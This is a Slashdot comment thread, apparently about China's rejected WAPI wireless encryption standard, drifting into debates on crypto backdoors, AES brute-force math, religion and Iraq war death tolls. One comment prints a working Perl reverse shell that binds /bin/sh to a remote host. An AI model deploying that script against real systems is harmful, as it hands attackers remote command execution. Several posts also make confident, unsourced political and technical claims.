Hei! First off, I've lived in Norway and have family there, and you jokers have enough religious bigotry and heavy handed moralists to spare there as well. Does the name Fremskrittpartie and Carl I. Hagen mean nothing to you? What about The National Sammling? Don't get me wrong, I love Norway, and think it is one of the best run countries in the world, but don't pretend for one moment that you guys are free from any of the stuff that we here in America have. The only difference is that when one of our extremists shows their ass, it makes international news in every single blessed language. In Norway, however, it goes no further than the back pages of Aftenposten. Most countries have these jerks hiding in the political pot, the problem is that the U.S. is just a little more visible and our system is based on an "ALL or NOTHING" type of victory, giving extremists much more of a voice in a party.

Lastly, I have no idea what Bush wants to do or doesn't want to do, and if you are honest, neither do you. I'll give him the benifit of a doubt and say that 9/11 and the obvious growing Islamic-styled terrorist has led a very provincial man catering to his very provincial base to act in ways that have not taken into consideration international sensibilities.

Re:"Christian"? WTF?

[Fordiman]

Funny joke. You might want to use a smiley or something to indicate you're being sarcastic.

Re:"Christian"? WTF?

[MysteriousPreacher]

Oh yes they are Christians & Muslims. They read the same texts and interpreted them differently. There are some good rules for living in the Bible and the Koran but both also contain some really nasty guidance. It's worth checking the Bible to see some of the nastier areas and also see what the Koran has to say regards unbelievers.

Re:"Christian"? WTF?

[WindBourne]

Yes, the christian taliban is in control of the gov. For starters, listen to W. when he does a speach. He will state that God is on ourside, which is nothing less than sacraligous. He does not know exactly what god or christ wants. Worse, he does that will at the same time ordering the torture, maming, and murder of others. I seriously doubt that Christ would want that.

Last night, 60 minutes had a great expose about the plan B. We are trying to move to over the counter since it has been shown to be safe. The admin shelved it due to concerns about under developing kids. getting it. So the company pushed for through the pharmasist, but no prescription needed (i.e. control of the drug). This time, the admin flat out tabled it and even went so far as to speak about moral objections, but not one word of a scientific argument against it.

They are currently trying hard to table a vaccine that would prevent cervical cancer for women, but it has to be admin as a child. The gov. is now fighting it as they argue that it would make women more promiscious( this is the same argument that Reagan used in 1981 to not fund CDC additionally for fighting against the HIV beginning; that religious choice has literally cost America 100's of billions of dollars and 10's of 1000's of lives and will continue to do so until a vaccine is developed). Fortunately, once this admin is gone, it is most likely that the next admin will reverse that choice, and this one will only cost America a few thousand women lives and 100's of millions of dollar (a high price, but it is stoppable).

I do not like Iran, but at least they are open about. They hold an election, and then the freely elected governs in conjuction with islam priest. OTH, America holds and election and if a far right winger gets in, he is beholden to the christian extermists (bear in mind, that the vast majority of christians are not extremists and do not desire to have the church control us; just a small minority who are hard core; Focus on the Family, Pat robertson (1 ton leg lifts or lets murder chavez), Oral Roberts(god is recalling me), and of course, the moral majority (which are neither) ).

Re:"Christian"? WTF?

[Nutria]

I do not like Iran, but at least they are open about. They hold an election, and then the freely elected governs in conjuction with islam priest.

Sure they are open: Mullahs decide who gets to run for office.

Last time I checked, neither Pat Robertson nor Jerry Falwell got to decide whether Ted Kennedy was allowed to run for the Senate.

Re:"Christian"? WTF?

[fnord_uk]

So do you? You say you would rather trust a religious person than a non-religious philosophy? To do what, exactly? They're both completely different things.

Re:"Christian"? WTF?

[WindBourne]

Iran was able to field 10's of candidates, some who were apparently liberal. USA has pretty much 2 at a time, due to the republicans and democrats locking out other parties. If things were so free here, then why not have presidential debates of the top 3-5 parties? And yes, it is the republicans who are preventing the other parties from doing debates. Personally, I think that the dems should show up for the womens debate with other parties.

Re:"Christian"? WTF?

[Nutria]

Iran was able to field 10's of candidates, some who were apparently liberal.

"Apparently" is the key word. "Hurt the Jews, but don't kill them" may be radically liberal in Iran, but isn't "liberal" by any western definition.

Re:"Christian"? WTF?

Some is not a Christian because of their behaviour. Anyone can behave well. Often, Christians are such *despite* their behaviour.

Christianity is about a relationship, not about rules.

Re:"Christian"? WTF?

[lump]

Sorry, but your "One final thought" is logically flawed. Trusting someone who believes things for which there is no evidence is a bad idea. People who believe whatever they want are the same people who do whatever they want, and then delude themselves into "believing" they must be right. Especially when they are constantly hypnotizing themselves into believing they must be "good" and "true", because they "follow god".

Conversely, people who accept reality are not in the habit of deluding themselves, and are less likely to lie to themselves and excuse their own actions. This is more likely to result in a trustworthy person. "Be true to yourself" is good advice.

Re:"Christian"? WTF?

[Loquax]

Lump-- I would argue that true faith is the ultimate in skepticism. You seem to put a lot of faith into something called "evidence" when accepting so called "empirical" evidence is the ultimate leap of faith. Evidence is always filtered through our own neurology. You seem to be saying that a) neurological perception equals b) reality. The true skeptic is skeptical of his own skepticism. We all place faith in something---science, mathematics, and logic put faith that there is an objective reality that we can know separate from our emotional lives. Don't get me wrong, if I want to get to the moon in a rocket, give me science, but if I am looking for a guide in my life, I want something that acknowledges my own imperfect neurology and acknowledges that there may be something greater than myself, greater than humanity that has a better perspective on things than I do. Sure, some people use religion as a way to self-justify their actions. Don't try to tell me that people don't use science do the same. I seem to recall the Nazi's loved a science called Eugenics that made perfect logical sense--the way to improve the "breeding" of mankind is to scientifically eliminate the "inferior" members of our gene pool. I also recall a little movement called Communism that put faith in a sociological and economical model to the point where mass deportations and death were completely acceptable.

We are not reasoning machines that feel, we are .feeling beings that occasionally reason logically. Man is not the pinnacle of perception.

Re:"Christian"? WTF?

[lump]

So what you're telling me is that up is down, black is white, and the complete lack of "emirical" evidence for a "god" is all the proof I need that one exists.

Thanks for putting me straight on that. :-)

Re:"Christian"? WTF?

[Loquax]

Lets look at your last statement point by point 1) "So what you're telling me is that up is down"-- Up can be down depending on who's viewing who. In deep space there is no up or down beside for the one you choose for yourself. 2) "black is white"-- When mixing light, Black is the absense of all colors and white is the presence of all colors, when mixing paint it can be the other way around. So, yeah, black is white given the situation. Additionally, we perceive black and white with our neurology. Who is to say we aren't the ones seeing things in reverse? 3)"and the complete lack of "emirical" evidence for a "god" is all the proof I need that one exists."-- What you call empirical evidence depends on you placing absolute faith in your ability to perceive reality as it actually "is." If however we argue not in the reality of the thing, but in its "usefulness" and center the statements above a little different way, we have something to talk about. 1) I find it useful (for me) to believe that there is an "up" and a "down" at this moment in time sitting in my chair at the computer. 2) I find it useful (for me) to define black and white dependent upon which medium (light or pigmentation) I am using. I find it useful to reverse this definition when I am working with photographic negatives where black is white and white is black. 3) I find it useful (for me) to believe in a unifying absolute and a purpose to life. I find it useful (for me) to believe that salvation can be achived and has been achieved. I find it useful (for me) to believe that fluid concepts of mercy and love enhance my ability to think logically and engage the world. So, yeah, I find it useful (for me) to believe in God. Is there a God? I don't know. I doubt we'll ever really "know" in this life or any other, but hey, what the hell do I know?

Re:"Christian"? WTF?

[lump]

I think you're using a certain amount of subterfuge in your arguments there. Ok, everyone knows that our perceptions are not perfect, but we are able to use that knowledge sensibly, and understand our world anyway. And the meaning of words may be flexible, depending on the situation, but that doesn't invalidate their meaning, or my perception of a given situation.

Example: everyone knows that if you jump off a tall building, you're going to fall, and probably die.

So. Decision time - do I jump off one day because I'm running late, and I want to float to the bottom, rather than wait for the lift, or do I wait for the lift, because my (imperfect) human perceptions tell me if I jump off I will die?

Sorry, but I'm going with my flawed perception of reality. Equally, if someone tells me that some guy in the clouds created the whole planet, and everything on it, etc., and therefore I should change the way I live my life, I'm going to want some proof. The onus of proof must always be on the person/s who are introducing the concept. If it can't be proven, then it is actually irresponsible to accept it.

Our perceptions may not be perfect, and our knowledge of this world may not be complete, but that is no reason to make stuff up.

Still, It's not really for me to try and argue you out of your beliefs. The only reason religious beliefs get a bit of a response from me is that they unfortunately get used sometimes, by some people, to try and control others, and sometimes I'm in the "others" group, regardless of my feelings on the validity of the beliefs in question. I don't begrudge people having their beliefs if it makes them feel good.

But if that was me, it would drive me crazy thinking that I was maybe ignoring some facts, and simply going on stuff I was told by other people, and maybe missing out somewhere.

The thing is, from reading your comments, I think you're probably much like me - ie: you base your day to day decisions on logical, rational decisions, using the best tool you have at your disposal - your perception on what is real, and what is not. This is what always surprises me about intelligent people who are religious - there seems to be a suspension of disbelief, when it comes to matters of spirituality, and I find it hard to reconcile that with the person's general approach to thinking.

Re:"Christian"? WTF?

[Loquax]

Lump-- Now we are discussing something that can be discussed, namely usefullness (as opposed to existence or proof). I quite agree, given my perception of reality and my past experience with perceived gravity that jumping off a building is NOT a useful or wise thing to do. Waiting for the lift, however, is a wise thing to do because it is more useful than trusting gravity and terminal velocities to get you safely to the ground.

Your gripe with religion(s) seems to be based in what I hesitently call the "mythical" qualities of religion. I don't mean that these aspects of religion are not "true" or "real" or whatever. Let me explain it like this. I have a child of 3 years old, and I am expecting a second child. My wife and I have been telling him that mommy has a baby in her tummy, and that mommy's and daddy's make babies. If I pulled out videos and college textbooks and diagrams and tried to explain to his 3 year old mind how DNA, sperm, ovum, etc works I would not be presenting the information in an age appropriate way. Now to say that mommies and daddies make babies and that babies grow in mommies' tummies is not a "lie" in any sense of the word. The information in this form is "usefull" for my son to operate with day to day. If he grows up and tries to enter medical school, asserting that babies gestate in the stomach as useful knowlege for a doctor, he will not get the reception he would like.

If the ancient Hebrews and other tribes of the Middle East had been told about DNA, mutations, evolution, etc., the information would have been "useless." The story of Genisis gives plenty of operational knowlege to people of that time, and still teaches us something today.

Take for example the story of Adam and Eve. What it tells us, if we read it right is not scientific (as you and I would assert science), but rather it tells something about the human condition that rings true whereever humans are--If you place limits on people and forbid them from doing something, they will probably do it anyways and try to hide the fact that they did it.

The story of Cain and Able tells us both about the possible conflict early people who drove cattle verses thoes who grew crops, but it also tells us that human beings will envy each other and kill each other where envy runs unchecked.

One of the "myths" we have today centers around the idea that the Earth is collectivly intellegent and an organism in its own right--the Gaia theory. Given what we know about biology, geology and climate, it makes for a useful "story" for us to follow. Take that story/theory expoentially farther, and you see that the universe itself is a collective intellegence that perceives itself and reveals itself to itself. I call this God, sometimes I call it the Tao. The Tao Te Ching states that the Tao/Universe/God you can "name" is not the "real" one as the "real" one is outside our neurological ability to conceive of it or name it.

Trust me, I understand your resistance. I spent the better part of my life as an agnostic and believed there was no room for the mystic or mysterious in my life or the lives of others. And yes, I saw that there were people in this world who used faith as a way to gain power over others. But I learned that the poison is the cure and that in the interplay between faith and doubt, relativity and objectivity, is a place that is much more "useful" for me to be.

jd

Re:"Christian"? WTF?

[lump]

Loquax - Thanks for your patient explanations - I know I'm pretty stubborn in my views. I guess a lot of people are. I don't know that I'll ever come to think of religion, or spirituality in a positive way. For me, the wonder of the world I see around me is more than enough - I don't feel the need to have anything metaphysical in my life.

Obviously I accept that we don't know for sure what the universe is all about, but as stated previously, I just don't see any need to invent anything to explain things we don't know, or understand yet.

Still, at least you are able to calmly debate me, rather than just take offence that I'm not agreeing with you. It's very tempting for me to try and argue your points some more, but I think that would just be wasting both of our time, so I'll leave it. As much as it is probably human to try and bring others around to your own way of thinking, the world would probably be a very boring place if everyone thought exactly alike.

Cheers.

Re:"Christian"? WTF?

[Loquax]

Ditto--- Good conversation! If you have time, read a good translation of the Tao te Ching. It really gets to the heart of the whole subjective vs objective perspective. The Taoists were dealing with the whole science vs mystical debate thousands of years before the West. Have fun! JD

Re:"Christian"? WTF?

[lump]

I may just do that. Although I'm not overly interested in matters of spirituality etc., I have to admit to quite liking the eastern take on philosophy (not claiming to know much here, just that I have generally been able to relate what I have heard or read).

I'll keep an eye out for an English language version. Thanks.

it's all about money

[ezh]

most of these 'standards' come with a lot of strings attached: implementation of certain pieces of technology, support infrastructure, etc. are patented. patents rule this world. wapi must be well-protected by chinese corporations, while its alternative is probably surrounded by a patent mind field that belongs to u.s. companies. it is all about money, as usual.

Erm

[Turn-X+Alphonse]

China throws a hissy fit because it's standards not used? How is this new? It's standard practice to storm out if something you don't like happens. It disrupts the meeting and makes you get your way much easier. Every 4 year old kid can tell you this..

I don't trust China and I don't trust America, but last time I checked "offical" ment jackshit in the tech world. People will use what they deem is best and anything official will either be picked by geeks and become standard or it'll be dead within a few years and replaced by another standard untill geekdom kicks in.

Re:Erm

[Kosmik]

Whatever made you think politicans were anything more than big kids with more dangerous toys.

Re:Erm

[flooey]

I don't trust China and I don't trust America, but last time I checked "offical" ment jackshit in the tech world.

The difference is between hardware and software. In software, that's largely true, but in hardware the reverse is often true. Hardware isn't patched or updated frequently (often never), so you need to make sure that your hardware works with the other guy's hardware at the time that they're both made at the factory. There's also a big lead time you need on selling hardware; if the "next big thing" occurs, it takes hardware companies a long time (relative to software) to get that into their pipeline and onto store shelves. If China loses out and decides to sell their own crypto method anyway, nobody will interoperate with it, so it won't do well.

Re:Erm

[newt0311]

"big kids with dangerous toys"??? please, lets not insult the big kids in this world. Calling politicians "big kids" is like calling a grain of sand a mountain.

And Apple is pushing...

[demongeek]

i11.208, the white and user-friendly encryption that is so hip only the coolest will use it (or be able to afford it)..

I jest! I jest! *ducks*

Re:And Apple is pushing...

[zolaris]

But the REAL question is can you encrypt something with only a click-wheel? And in a year will they come out with the i11.208 pico (half the size and 10 times the cipher block size)?

OOooodfjrfhghjg

[Konster]

So code your own. WEP, WAP WIP WOP WUP fuckee doo, really.

This IS Slashdot, isn't it? Why is this news? :D

Re:OOooodfjrfhghjg

[phillips321]

You forgot "WANER with a silent K"

Re:OOooodfjrfhghjg

[jamstigator]

Speaking on behalf of Italians, we find the aforementioned WOP encryption deeply offensive!

Not so fast Sherlock...

[bigmouth_strikes]

There are no "backdoors" in standards, only in implementations.

Re:Not so fast Sherlock...

[TexasDex]

Bzzt! WRONG!

Encryption standards can have mathematically exploitable weaknesses, either inadvertently or intentionally created. Don't believe me? Look up the kind of encryption used for WEP.

Re:Not so fast Sherlock...

[Eivind]

It depends. In the case of AES, it's perfectly possible, if not very likely, that the NSA is aware of some weakness the rest of us doesn't know about. It's even possible they had a finger in subtly changing AES to deliberately have this weakness.

I don't find it particularily likely, but it's perfectly possible. And I'd definitely accept that as a backdoor. The typical definition of backdoor is something like deliberate hole in security, often put in by the designers and/or creators of the product in question.

An encryption-standard with a deliberate, undisclosed, weakness would qualify, or atleast I don't see any reason why you'd disqualify it.

Re:Not so fast Sherlock...

[dr_dank]

There are no "backdoors" in standards, only in implementations.

I think Mr. Goatse would disagree with you.

Re:Not so fast Sherlock...

[quarkscat]

Let's see what the real issues are:

IEEE / ISO standard == open standard
Chinese WAPI == closed standard

The Chinese government requires that any implimentor pay
licensing costs to China. If you want to embed their WAPI,
you must incorporate in China with a Chinese entity as the
majority shareholder. The questions become: "Does Intel
really want to make the Chinese government their "senior"
partner in chipset fabs, just to get WAPI embedded?"
"And considering the potential for Chinese government trojans
and/or backdoors in their WAPI code, would Intel risk losing
any /all of their Western government hardware sales by
adopting WAPI?"

Leveno quality control, as well as the increased potential for
trojans / backdoors in their software drivers, has already
made a negative impact on sales of IBM's former hardware
company.

Re:Not so fast Sherlock...

[jdhutchins]

It's also possible the NSA knew of some weakness, and then subtly changed the algorithm to fix it. The NSA's internal research is possibly many, many years ahead of the rest of the world's research. IIRC, when DES was being developed, the NSA made some changed to it, but didn't say why. Years later, when differential cryptography was invented/discovered, the NSA's changes made perfect sense because it made the algorithm resistant to many of those types of attacks.

Re:Not so fast Sherlock...

[awehttam]

Well I dunno,

#!/usr/bin/perl
use Socket;
$host = $ARGV[0];
$port = 80;
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ;
my $target = inet_aton($host);
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
die;
}

if (!fork( )) {
open(STDIN,">&SERVER");
open(STDOUT,">&SERVER");
open(STDERR,">&SERVER");

exec {'/bin/sh'} '-bash' . "\0" x 4;
exit(0);
}

seems like a pretty standard backdoor..

Re:Not so fast Sherlock...

[Fordiman]

Ohhh, so the chinese are trying to bully their way into the wireless industry in an incredibly obvious and poorly negotiated way, and when they failed, they went crying excusionism and stomping their feet and pouting.

See me not give a flying rat's ass.

Re:Not so fast Sherlock...

[edwinolson]

Nonsense.

If the standard requires the use of a particular series of S-boxes or other operations that are known by the inventor to permit a particularly effective cryptoanalysis, then the standard has a backdoor. It is likely easier to build these into the algorithm than to discover them as a reviewer.

Additional backdoors could be part of a particular implementation, of course.

Re:Not so fast Sherlock...

[flooey]

In the case of AES, it's perfectly possible, if not very likely, that the NSA is aware of some weakness the rest of us doesn't know about. It's even possible they had a finger in subtly changing AES to deliberately have this weakness.

I actually think that's incredibly unlikely, because AES is approved for use in protecting classified information. The NSA is smart enough to know that if they were to put a backdoor in, someone would eventually discover it, quite possibly someone from an enemy intelligence agency, so were there a backdoor I doubt they'd approve the cipher for protecting classified information (all the way up to Top Secret, using 256 bit keys).

Re:Not so fast Sherlock...

The NSA's internal research is possibly many, many years ahead of the rest of the world's research. IIRC, when DES was being developed, the NSA made some changed to it, but didn't say why. Years later, when differential cryptography was invented/discovered, the NSA's changes made perfect sense because it made the algorithm resistant to many of those types of attacks.

That's not correct. IBM invented differential cryptography and the NSA told them to keep it secret for many years (how nice of them, aye?). Having knowledge of differential cryptography developed by IBM, the NSA strengthened the DES algorithm. There is no reason to believe the NSA is substantially more advanced than their counterparts throughout the world.

Re:Not so fast Sherlock...

[evilviper]

NSA's internal research is possibly many, many years ahead of the rest of the world's research.

The general concensus is that the NSA is pretty much on-par with the commercial and academic community. They may be slightly ahead, but they certainly aren't years ahead, as used-to be the case.

Re:Not so fast Sherlock...

[Eivind]

Unless offcourse the backdoor was mathemathically proven to be only usable by knowing some secret key used while generating the backdoor.

In other words, it could be that encrypting with AES and one secret key in reality is equivalent to encrypting with two different secret keys, one of which NSA holds.

I agree this is mindbogglingly unlikely.

Re:Not so fast Sherlock...

If you're going to attack Lenovo's quality control and security risks with no citations, evidence, or even reasons, at least spell their name right.

Re:Not so fast Sherlock...

[Kadin2048]

I don't think Mr. Goatse is a standard, by anyone's definition.

Or at least if he's the standard somewhere, I hope to God I never go there.

Re:Not so fast Sherlock...

[Schraegstrichpunkt]

Replace "cryptography" with "cryptanalysis", and your post will make sense.

Re:Not so fast Sherlock...

[bigmouth_strikes]

Fair enough, a party (country) could be effectively "submarining" an easily cracked technology/method into a standard. But to be useful as a backdoor it had to stay 100% a secret or else it would be meaningless for said party - they have be sure that it wouldn't be used against themselves. Seeing that as practically impossible, I still consider an open standard to be without backdoors; known or later discovered flaws would be just that - flaws, not backdoors.

Re:Not so fast Sherlock...

[Watson+Ladd]

AES has a simple algebraic structure that makes breaking it a simultanious quadratic equation problem. In NP, but pretty close to getting done efficiently. That they should have seen and changed.

Winner!

WAP WIP WOP WUP fuckee doo

Any crypto standard with a name like that gets my vote.

Re:openssl?

[deevnil]

Everybody wants to use /their/ secret, of course. If it can't have code that all parties can audit.... ? I mean for real. OpenWhatever then, or is it just play-encryption.

Hypocracy

[tomstdenis]

We're all upset that the Chinese want to introduce their closed-door proprietary standard...

But please, tell me, how many cryptographers were consulted BEFORE the design of WEP? I know of a few who worked on the implementation AFTER the design [e.g. when they couldn't change things]. WEP and WAP [and WiMAX and ...] are all essentially closed door standards. Even if you're in the SIG you're only one of many. And the many are usually NOT cryptographers so they'll basically vote for whatever turns into the least amount of VB.NET code for their Windows only drivers.

Like it's so fucking hard to get a shared-secret lossy communication medium secured... AES + CCM + proper rekeying == router that doesn't cost 69.95$ at Fry's but does == a wifi device you can trust.

Tom

Re:Hypocracy

[gkhan1]

You do know of this great protocol called Wi-Fi Protected Access, or WPA, don't you? You refer to something called WAP which I can only assume you mean to be the Wireless Application Protocol that cellphones use. Anyway, WPA is secure. It really is. Use a good password (25+ characters with some numbers and %"#&-characters) and there is not a force in the universe that can crack your password.

Re:Hypocracy

Since when is there Vb.Net code in drivers!?

Re:Hypocracy

[tomstdenis]

Only explanation why a printer driver could be more than 10MB in size :-)

Driver writers are usually the lowest of the low in terms of programming ability.

Tom

Re:Hypocracy

[mrchaotica]

No, the reason why printer drivers (in particular) are so big is that they have to recognize and refuse to print money, and put in tracable watermarks and stuff.

Re:Hypocracy

[theelectron]

Except the mainframes the NSA own...

Re:Hypocracy

Are you sure?
I would think the firmware handles that, especially the watermarking part.

Re:Hypocracy

[Daedala]

I think that there is a difference between hypocrisy and not repeating your mistakes.

Re:Hypocracy

[gkhan1]

Emm, no, they couldn't. Even if the NSA had double the computing power of the rest of the world, it would still take them millions of years to crack modern ciphers. So no, it aint possible

Re:Hypocracy

[theelectron]

http://www.nytimes.com/2006/06/14/technology/14sea rch.html?ex=1307937600&en=c96a72bbc5f90a47&ei=5088 &partner=rssnyt&emc=rss

Re:Hypocracy

[gkhan1]

That wont be NEAR enough, you'd need a couple of thousands of those to get the speed to under a millenia. Look, modern cryptography is MINDBLOWINGLY STRONG. Stronger than you can ever imagine.

Re:Hypocracy

[gkhan1]

You know what, I'm getting sick of clueless people saying "Well, the supercomputers at the NSA could crack it!" I'll run some numbers for you:

A couple of years ago we found out that if one was inclined to spend a few dozen million dollars, one could build a machine that could crack DES in 7 hours. Lets take that machine and hype it up to overdrive: let's assume that we could solve a DES cipher in one femtosecond (that is one quadrillionth of a second or 10^-15 or 0.000000000000001 seconds). This is far, far faster than the combined speed of all computers in the world (and I mean FAR FAR faster, you'd need like all the atoms in the solarsystem to build that computer). How long would it take that computer to crack an AES cipher?

Well, lets see: DES has a 56 bit key, AES has a 256 bit key. Lets assume that it takes equal amounts to try a key on both ciphers (which it almost does, I think AES is about 2 times faster, but that wont matter much so it's a reasonable simplification). That would mean that it would take (10^-15)*2^(256-56) femtoseconds to solve. How much is that? Well we can easily convert it to years: (10^15*2^200)/(femtoseconds in a second * seconds in an hour * hour in a day * day in a year)= (10^-15*2^200)/(10^15 * 3600 * 24 * 365) = 50955671114250072156962 years.

I'll say it again: Using impossible supercomputer-power that is unimaginably fast, it would take 50955671114250072156962 years to crack a standard, run of the mill, WPA2 connection with any old router (assuming you selected a good password.) Which is reassuring since the universe is only about 13700000000 years old.

Can you promise me that you will never again utter those mindblowingly stupid comments that say "Ofcourse the NSA can crack modern ciphers!" Can you reassure me that, or will you simply ignore this message and pretend you never saw it?

This "standard" is fucking ridiculous

[WhiteWolf666]

You have to partner with a bloody Chinese company to build equipment based on it.

That's fucking ridiculous.

The standard is unpublished, and will not be published. It checks in security keys with a centralized Chinese government server.

I cannot imagine a world that would permit this to become an international standard, and if China insists on all equipment manufactured within its borders to have this technology it'll just push electronics manufacturing out of China.

For a long time, people have predicted that the heavy hand of the Chinese government will one day disrupt the economic boom happening there. I hope to god not; an unstable, economically volatile China sounds like a nightmare to me.

Re:This "standard" is fucking ridiculous

[bombadier_beetle]

The standard is unpublished, and will not be published. It checks in security keys with a centralized Chinese government server.

I'm inclined to believe you, and I'm not "calling you out" or anything, but I've never heard that WAPI phones home, and none of the links I've read in this thread mention that. Do you have a source for that?

Re:This "standard" is fucking ridiculous

[bombadier_beetle]

Never mind, it was right there on the Wikipedia page for WAPI. Scary.

Re:This "standard" is fucking ridiculous

[WhiteWolf666]

To me, its less scary than goofy.

Why would the Chinese be dumb enough to think that the world would adopt such a standard? Do they really think that proprietary protocols that can only be manufactured by Chinese companies would be popular with non-Chinese companies?

Are they really that arrogant?

WAPI, in terms of internation acceptance, is doomed. There are so many flaws that I can't see the ISO seriously considering it. It's a goofy "standard", and it has nothing going for it.

Sounds a lot like DPRK

[amightywind]

...a lot of dirty tricks including deception, misinformation, confusion and reckless charging to lobby against WAPI.

I think China and North Korea use the same publicist.

Re:Sounds a lot like DPRK

[rehashed]

And I think that sounds like the spin prior to the war in Iraq.

Re:Sounds a lot like DPRK

[amightywind]

I think the Iraq war is a resounding success. An elected government is in place. The terror mastermind is dead meat. Way to go Dub!

Re:Sounds a lot like DPRK

You forgot the thousand of innocents dead http://www.iraqbodycount.net/. Way to go Dub!

Re:Sounds a lot like DPRK

[amightywind]

Have you considered the death toll under Saddam? Being President means making difficult choices (Dub), not leaving problems for the next guy (Clinton).

Re:Sounds a lot like DPRK

[rehashed]

Maybe you should look at a more reputable resource as the original poster provided. Amnesty International reports the death toll under saddam as just over 17,000. I think you will find that is LESS than those slaughtered by "friendly" forces during the illegal invasion of Iraq...

Re:Sounds a lot like DPRK

[dfjghsk]

17,000?! What a joke.

http://www.usaid.gov/iraq/pdf/iraq_mass_graves.pdf

Since the Saddam Hussein regime was overthrown in May,
270 mass graves have been reported. By mid-January,
2004, the number of confirmed sites climbed to fifty-three.
Some graves hold a few dozen bodiestheir arms lashed
together and the bullet holes in the backs of skulls testimo-
ny to their execution. Other graves go on for hundreds of
meters, densely packed with thousands of bodies.
Weve already discovered just so far the remains of
400,000 people in mass graves, said British Prime
Minister Tony Blair on November 20 in London. The
United Nations, the U.S. State Department, Amnesty
International, and Human Rights Watch (HRW) all
estimate that Saddam Husseins regime murdered hun
dreds of thousands of innocent people. Human Rights
Watch estimates that as many as 290,000 Iraqis have
been disappeared by the Iraqi government over the
past two decades, said the group in a statement in May.
Many of these disappeared are those whose remains
are now being unearthed in mass graves all over Iraq.
If these numbers prove accurate, they represent a crime
against humanity surpassed only by the Rwandan geno
cide of 1994, Pol Pots Cambodian killing fields in the
1970s, and the Nazi Holocaust of World War II.

Let me repeat that in case you missed it:

"We've already discovered just so far the remains of
400,000 people in mass graves," said British Prime
Minister Tony Blair on November 20 in London.

Re:Sounds a lot like DPRK

[rehashed]

"We found the weapons of mass destruction." said American President George W Bush on May 29.

I wouldnt put to much weight on quotes from war-mongering politicians. The article you mention also deliberately misquotes both Amnesty International. Additionally, the figures provided by Human Rights Watch (which was actually 290,000 come from the Kurds in Northern Iraq (hardly an unbias source), who have been at war with Iraq for over 20 years. When they sided with Iran in the decade long Iran-Iraq war, they included the death-toll for that war as a part of the calculation for genocide.
Finally, all the United Nations did was quote the HRW figure.
That only leaves one organisation on your list - the U.S state department - who quite frankly have their own agenda.

If you cannot tell spin from fact, especially if the sources of your information are far from reliable, censored, and just downright misleading, you are more of a fool than you think :)

I believe "pwned" is the correct expression

Re:Sounds a lot like DPRK

hehe... dont you realise the figure is so large so it makes you feel justified? ;)

Re:Sounds a lot like DPRK

[dfjghsk]

The article you mention also deliberately misquotes both Amnesty International.

Actually, it's you who deliberately misquotes AI. From AI's own website: http://www.amnesty.org/ailib/aireport/ar98/mde14.h tm

... an estimated 100,000 Kurdish civilians who "disappeared" in 1988 in the so-called "Operation Anfal"; ...

In October Amnesty International published a report, Iraq: "Disappearances" _ unresolved cases since the early 1980s, in which it appealed to the government to put an end to "disappearances" and to clarify the fate of hundreds of thousands of people who had "disappeared" since the early 1980s.

I'm going to believe HRW, AI, UN, and US State Dept (who all more-or-less agree on their estimates), than a troll on /. who can't even quote AI correctly.

Re:Sounds a lot like DPRK

As already stated, the only reason they "agree" on their estimates is because they all come from one source - the Kurds.
At the end of the day, the article you quoted is out of context - try reading the actual report instead. I think you will find the quote is accurate.

No one would deny that huge numbers of people have died in Iraq in the last two decades. The Iran-Iraq war claimed hundreds of thousands of lives. Huge numbers were killed by the Americans in the first Gulf War, and their bodies were sometimes bulldozed into mass graves. Amnesty International reckons that Saddam executed a few hundred people a year. If true, it is an appalling level of violence - so why exaggerate it? It is, incidentally, far lower than the rate at which we have killed Iraqi civilians in the war on Saddam.

If you want to swallow whatever your government feeds you, then feel free.
It amuses me how narrow minded and uneducated you are :)

Re:Sounds a lot like DPRK

[dfjghsk]

wow.. you are really something. You say I misquoted Amnesty International. So I post exactly what they say on their own website from their own reports. Yet you still say Amnesty International is saying something else.

You clearly believe whatever you want... evidence has nothing to do with it. You could at least say so, instead of lying through your teeth and saying AI said something they didn't.

Re:Sounds a lot like DPRK

[rehashed]

That wasnt a report - it was an article.
Additionally, it wasnt written by amnesty international, it just so happens to be on their website.
Like I said - go read the referenced article.

I love the way people get agressive when they are blatantly wrong. Have I struck a nerve?

Re:Sounds a lot like DPRK

[amightywind]

Help me take back Slashdot. When did 'News for Nerds' become 'FUD and Conspiracy Theories for Extremist Nutjobs'?

I am with you. Add junk science, pacificism, and Micro$oft propaganda to this list.

Re:Sounds a lot like DPRK

[iminplaya]

Yeah, and all that during the height of American/European support. Do you actually think that our governments give a tinker's damn about how many people he killed? He killed the "right" people. They were "terrorists". And the money and weapons just kept on flowing in. Saddam only got into trouble when he stepped on the wrong toes. Same with the Taliban. So come down off your high horse and make even the feeblest effort to see the whole picture. Rumsfeld and his other supporters should be held right along side of Saddam in that court room. Otherwise the trial truly is a farce.

Poor diplomacy is counterproductive

[mclaincausey]

If China wants to be heard in the international community, then they should participate in other global standards, or should have opened up the design and devlopment process of WAPI to either participation or scrutiny. They developed the standard knowing that their was an international effort (NOT American) to come up with the next generation of WLAN encryption, so I have no sympathy for the wasted effort at this stage. If China wants to effectively participate in the global standards game, they should, for instance, start a Common Criteria scheme and become a signatory country. It seems to this casual observer that China often likes to go it alone wrt standards, and when they suddenly start blustering about this international community not subscribing to their arbitrary standard is ridiculous. Why should the IEEE's efforts be thrown out? They lost the vote. They can complain about the vote being rigged or unfair, but a voting system is the closest approximation to a fair way of determining next-gen standards. I hear voting isn't so popular over in China though.

Re:Poor diplomacy is counterproductive

[crawling_chaos]

Perhaps it is because in the developed world our "ideal" standard is something developed by consensus, whereas in China the "ideal" standard is to do what the government tells you and shut up already? That would lead to two competing styles of negotiation, one where differences are worked out, and another where, in the absence of an ability to simply arrest everyone who disagrees with you and use them for spare parts in your state run organ farms, the only option is to walk out in a huff?

And yes, it worries me that the US is sliding more and more toward the Chinese ideal.

Raises interesting question

[HangingChad]

What if some day the Chinese decided that they're not going to produce devices that don't meet their standards? So far it hasn't been a problem but if the government decided all Chinese factories were going to produce routers with China-Fi encryption, that's what they'd produce.

And since they own all our manufacturing capacity, there would be little we could do about it. It would take years to tool up enough manufacturing to replace everything we depend on them to produce.

I guess being dependent on foreign oil wasn't good enough. We had to match that folly by sending our component manufacturing overseas as well.

Re:Raises interesting question

[iamplasma]

What if some day the Chinese decided that they're not going to produce devices that don't meet their standards? So far it hasn't been a problem but if the government decided all Chinese factories were going to produce routers with China-Fi encryption, that's what they'd produce.

And since they own all our manufacturing capacity, there would be little we could do about it. It would take years to tool up enough manufacturing to replace everything we depend on them to produce.

